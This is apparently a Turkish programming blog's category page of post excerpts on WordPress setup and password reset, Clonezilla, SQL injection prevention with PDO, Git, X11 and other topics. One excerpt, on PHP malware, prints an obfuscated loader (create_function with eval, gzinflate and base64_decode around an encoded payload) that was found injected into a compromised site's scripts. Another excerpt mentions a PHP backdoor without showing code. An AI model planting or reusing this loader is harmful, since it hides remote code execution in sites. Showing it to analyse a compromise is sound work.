Modern web tarayıcılar yazıcıya çıktı gönderirken yazıcı diyalog penceresini görüntüler ve kullanıcıdan son bir yazdırma onayı alır. Bu modern tarayıcılara eklenmiş bir güvenlik özelliği olarak düşünülebilir. Aksi taktirde kötü niyetli bir web sayfası yazıcınıza yüzlerce sayfa çıkt gönderebilirdi. Bunu kimse istemez.
Okumaya devam et “Web sayfasından yazıcıya otomatik (diyalogsuz) çıktı göndermek”Kategori: Programlama
Programlama ya da diğer adıyla yazılım, bilgisayarın donanıma nasıl davranacağını anlatan, bilgisayara yön veren komutlar, kelimeler, aritmetik işlemlerdir.Diğer bir tanım verecek olursak programlama, bilgisayar programlarının yazılması, test edilmesi ve bakımının yapılması sürecine verilen isimdir. Wikipedia
XAMPP’e WordPress Kurmak
Meslek liselerinde okutulan Web Tabanlı İçerik Yönetim Sistemleri dersinin ilk konusu olan PHP+MySQL özellikli bir web sunucuya WordPress kurmak için aşağıdaki adımları dikkatlice uyguladığınızda hedefinize ulaşabilirsiniz. Ayrıca derse ait örnek sınav soruları için yazının sonundaki indirme bağlantısını kullanabilirsiniz.
Okumaya devam et “XAMPP’e WordPress Kurmak”Bootable Clonezilla ISO Imajı Oluşturmak
Bu yazımda diskleri klonlamak için kullanılan açık kaynak kodlu bir yedekleme aracı olan Clonezilla’nın faydalı olduğunu düşündüğüm (ve pek bilinmeyen) bazı pratiklerinden bahsedeceğim. Clonezilla’yı kullanmaya aşina olduğunuzu varsayarak detaya girmeden birkaç kullanışlı senaryoyu anlatayım.
- Clonezilla To RAM seçeneği
- Başlatılabilir (bootable) kurtarma ISO’su oluşturmak
- Clonezilla ile gelen kullanışlı araçlar
WordPress Parolasını Sıfırlamak
WordPress parolasını sıfırlamak için veritabanını kullanabilirsiniz. WordPress kullanıcılarının bilgisi wp_users adındaki tabloda tutulur. Kullanıcının parolası ise MD5 hash’i ile korunmuştur, yani açık şekilde veritabanından kayıtlı değildir.
WordPress kullanıcı adını hatırlamıyorsanız veritabanı konsoluna aşağıdaki SQL komutunu yazarak kullanıcıları listeleyebilirsiniz.
MariaDB [wordpress]> select user_login,user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass |
+------------+------------------------------------+
| admin | $P$BBhCPKezzES0g/Pzs30Qut4U.cWd6Q0 |
+------------+------------------------------------+
1 row in set (0.000 sec)
Yukarıdaki SQL çıktısında kullanıcı adının kurulum esnasında admin olarak belirlendiği gözüküyor. admin isimli kullanıcının parolasını değiştirmek için ise aşağıdaki SQL komutunu çalıştırabilirsiniz.
UPDATE wp_users SET user_pass = MD5('tankado') WHERE user_login = 'admin';
Okumaya devam et “WordPress Parolasını Sıfırlamak” PHP – The Wrong Way (Galat-ı Meşhur)

PHP programlama dünyasında, bir dizi eğilim bazı insanlar tarafından (kendi kitaplarında ve web sitelerinde) “Modern PHP” olarak pazarlanırken, aynı zamanda diğer tüm yaklaşımlar sanki ilkel, aptalca veya yanlış olarak sunuluyor. Bu insanlar yorulmadan başkalarının işlerini yaparken kendilerinin yollarını takip etmelerini sağlamaya çalışıyor gibi görünüyorlar. Bu web sitesi PHP ile programlama yapanlara pragmatik bir bakış sunmak amacıyla oluşturulmuştur. Hedeflenen popüler eğilimler, teori veya akademik dogmalardan ziyade tecrübeden ve pratik sonuçlardan oluşturulmuş bir bakış açısı ortaya çıkarmaktır.
PHP – The Wrong Way yaşayan bir site olacak ve yenilikler ortaya çıktıkça site güncellenecektir.
Her türlü katkıya ve yardıma açığız.
Okumaya devam et “PHP – The Wrong Way (Galat-ı Meşhur)”X11 ve X.Org arasındaki fark nedir?
X.Org ve X11, grafik ortamlarını ve pencere sistemlerini yönetmek için kullanılan yazılımların adlarıdır, ancak bu iki terim sıklıkla karıştırılır. İşte X.Org ve X11 arasındaki farkları anlatan bir açıklama:
X11 (X Window System):
X11, orijinal olarak 1984 yılında Massachusetts Teknoloji Enstitüsü (MIT) tarafından geliştirilmeye başlanmış olan bir pencere sistemi protokolünün adıdır.
X11, Unix ve Unix benzeri işletim sistemlerinde grafiksel kullanıcı arabirimlerini yönetmek için kullanılır.
X11, X sunucusu ve X istemcisi arasındaki iletişimi kurmak ve grafiksel öğelerin pencere yönetimini sağlamak için kullanılan bir pencere sistemi protokolüdür.
X11, yıllar içinde birçok sürüm ve güncelleme almış ve geliştirilmiştir.
PHP’de SQL enjeksiyonları nasıl önlenir (PDO)
SQL enjeksiyonu, en yaygın şekilde var olan ve en çok zarar veren web uygulaması güvenlik açıklarından biridir. Neyse ki, hem programlama dilleri hem de RDBMS’lerin kendileri, web uygulaması geliştiricilerine veritabanını güvenli bir şekilde sorgulamanın bir yolunu (parametreli SQL sorguları) sağlamak için gelişti.
SQLi saldırılarından korunmak için parametreli sorgular kullanılır. Parametreli sorguların yazılması ve anlaşılması kolaydır ve bu geliştiriciyi bir ifadedeki gerçek değişkenler için yer tutucuları kullanarak tüm SQL ifadesini önceden tanımlamaya zorlar. Geliştirici SQL ifadesi tanımlandıktan sonra her parametreyi sorguya geçirerek veritabanının SQL komutu ile bir kullanıcı tarafından girilen veriler arasında ayrım yapabilmesini sağlar. SQL komutları bir saldırgan tarafından girilirse, parametreli sorgu girdiyi SQL komutunun aksine bir dize olarak değerlendirir.
Okumaya devam et “PHP’de SQL enjeksiyonları nasıl önlenir (PDO)”Tillson T3 İndikatörünü PHP ile Yazalım
Tillson T3 indikatörü, T3, Tillson hareketli ortalamaları olarak da bilinir. Bu teknik göstergenin geliştirilmesinin ardındaki düşünce hareketli ortalamalarda bulunabilecek gecikme ve yanlış sinyalleri iyileştirmekti. T3, diğer ortalama alan (SMA, EMA vb) trend indikatörlerine göre daha yumuşak (daha pürüzsüz) ve duyarlı sonuçlar üretir. T3 kullanılarak trend dönüşleri hissedilebilir.
Okumaya devam et “Tillson T3 İndikatörünü PHP ile Yazalım”İlginç bir PHP arka kapısı
Birkaç yıl önce Genius‘un sayesinde haberdar olduğum aşağıdaki kod hala daha (v7.2.x) çalışmakta. İlginç yanı short_tags etkin olmasa dahi çalışıyor. Daha ilginci ve hakkkında pek bilgi bulamadığım kısmı ise dinamik olarak yaratılan ve veri (data) olarak ele alınması gereken bir yapının PHP tarafından bir metod (function) olarak değerlendirilmesi ve çalıştırılması.
Okumaya devam et “İlginç bir PHP arka kapısı”Zararlı bir PHP kodu (PHP Malware)
Eski bir wordpress plug’innin neden olduğu sızmada aşağıdaki kod php betiklerinin başına eklenmiş.
<? $oO0="cr"."eat"."e_fun"."cti"."on";$o0O=@$oO0('$x','ev'.'al'.'("?>".gz'.'inf'.'late'.'( bas'.'e64'.'_de'.'co'.'de($x)));');@$o0O("s7EvyCjg5cpM0yguKSrIL9ZQiQ92DQpzDYpW9wgJCYgPBfLiHd1d/ULUY3WU8vPTc1KT8kuUNDWrebk4M1ITU1KLNJRAKvUN9QwVjA0MFXzzy1JTFAJSi3IT81LzSnIqlTStkdT65CcnlmTm51kpZJSUFBRb6euXl5frpSUmp+YmFmcb5+ZZmuol5+cCNaVkpgI11vJy2dsBAA==");
Okumaya devam et “Zararlı bir PHP kodu (PHP Malware)” [access_compat:error] AH01797: client denied hatasının nedeni ve çözümü
Bu hata; Apache v2.4 üstüne güncellendiğinde yapılandırma dosyalarınızda kalan (.conf ve .htaccess’ler) Order ve ve Allow erişim kontrol yapılandırmalarının kaynaklanır. v2.4 sonrasında bu direktifler geçerli değil.
Okumaya devam et “[access_compat:error] AH01797: client denied hatasının nedeni ve çözümü”Basit Anlatımla: Git/GitHub Kullanımı
Baştan şunu söyleyeyim, programcılar ve bilgisayar kullanarak tasarım çalışmaları yapanlar açısından Git kullanmanın çok fazla avantajları var. Git, evvela geriye dönük olarak satır satır kod geçmişini tutuyor. Güzel bir backup ortamı sağlıyor ve aynı zamanda kodda geçmişte yaptığınız tüm değişiklikleri görebiliyorsunuz. Programlama haricinde çalışma yapanlar için de şu açıklamayı yapmakta fayda var; Git metin tabanlı bir kontrol sistemi. Git’i kullanabilmeniz için yaptığınız çalışmaların kaynak dosyaları metin tabanlı olmalı.
Okumaya devam et “Basit Anlatımla: Git/GitHub Kullanımı”Wordress “WordPress Missing Temporary folder” Hatasının Giderilmesi
Mesajda WordPress geçici dosyaların depolandığı dizine ulaşamıyor diyor. Bu dizin genellikle /tmp (root dizin altında). Eğer benim gibi Apache’nin VirtualHost/Directory direktifine php_admin_value open_basedir seçeneğini eklediyseniz hiçbir PHP bu dizinin dışına çıkamayacak ve WordPress doğal olarak bu hatayı verecektir.
Okumaya devam et “Wordress “WordPress Missing Temporary folder” Hatasının Giderilmesi”Raspberry Pi’a (Linux) MEB Kök Sertifikası Nasıl Yüklenir?
SSL (Secure Socket Layer), https gibi güvenli iletişim protokollerinin kullandığı şifreleme altyapısını sağlar. Güvenli bir protokol kullanarak gerçekleştirilen iletişim, her iki tarafta da (istemci ve sunucu) şifrelenerek aktarılır. Bunun için asimetrik şifreleme adı verilen bir yöntem kullanılır. Bu yönteme göre; özel ve açık anahtar adı verilen iki adet anahtar üretilmiştir. Açık anahtar herkesçe erişilebilirdir ve şifrelenmek istenen veri henüz istemci tarafında iken bu anahtar ile şifrelenerek gönderilir. Bu anahtarın şifrelediği veriyi sadece özel anahtar açabilir.
Okumaya devam et “Raspberry Pi’a (Linux) MEB Kök Sertifikası Nasıl Yüklenir?”Assembly Programlama Dili (eKitap )
Bu dokümanda Fehmi Noyan İSİ tarafından hazırlanan, Intel firmasının 80×86 serisi olarak nitelendirilen 8086, 80186, 80286, 80386,
80486 ve Pentium işlemcileri için 16-bit Assembly programlama dili genel yapısı ile anlatılacaktır . Bu sebepten, dokümanda sadece 8086, 80186 ve 80286 (Intel firmasının 16-bit işlemcileri) işlemciler için assembly dili anlatılacaktır. Örnekler MS-DOS işletim sistemi için yazılmıştır. Windows işletim sistemi için assembly programlama 32-bit olup bu dokümanda ele alınmayacaktır.
Kendi Linux Dağıtımınızı Oluşturun (LFS – Türkçe Dökümanı)
Linux From Scratch (LFS), Linux işletim sistemin gerekli bileşenlerini bir araya getirerek, yalnızca kullanım amacına yönelik yeni bir işletim sistemi oluşturmaişlemidir.Bu sayede, Linux dağıtımları ile birlikte gelen ve son kullanıcı tarafından kullanılmayacak programlar ve işlevlerin de işletim sistemi içerisinde yer almaması, böylece de performans ve sabit disk üzerinde kaplanan alan açısından da avantaj sağlanmış olmaktadır.Özellikle web sunucusu, dosya sunucusu, e-posta sunucusu, DHCP sunucusu gibi belirli bir amaca hizmet eden bilgisayarlarda üzerinde sadece ilgili programların olduğu bir işletim sistemi kullanmak bu açıdan faydalı olacaktır.
Okumaya devam et “Kendi Linux Dağıtımınızı Oluşturun (LFS – Türkçe Dökümanı)”RISC-V Komut Seti Mimarisi (ISA) Hakkında birkaç kelam…
Yazmakta olduğum kitabıma (şuanki ismi Raspberry Pi ile Linux ve Elektronik Uygulamaları) ARM ile ilgili birkaç kelam eklerken karşılaştığım açık kaynak işlemci komut seti mimarisi olan RISC-V hakkında bazı yorumlarımı ve bilgileri paylaşmak için bu kısa notu yazıyorum. Önce kitabıma ARM hakkında ne yazmıştım onu vereyim:
Okumaya devam et “RISC-V Komut Seti Mimarisi (ISA) Hakkında birkaç kelam…”ARM bilinenin aksine bir işlemci üreticisi değildir, daha çok gömülü sistemler için düşük güç tüketimine sahip RISC mimarisinde çalışan işlemci tasarımları yapar. ARM limited şirketi bu tasarımlarını lisans ücretleri karşılığında çeşitli sistem çipi (SoC) üreticisi firmalara satar (örn: Qualcom, Broadcom, NXP vb.). 1980’lerin başından beri farklı üreticiler tarafından yüzlerce ARM tasarımlı işlemci ürelmiştir. Günümüzde kişisel bilgisayarların (PC) dışındaki sistemlerde (mobil ve gömülü sistemler) kullanılan işlemcilerin %98’i ARM tabanlıdır yani en basit tabiri ile ARM firmasının tasarladığı komut kümesi ile uyumludur. ARM tabanlı belli başlı işlemci/SoC üreticileri Apple, NVidia, Qualcom ve Samsung’dur.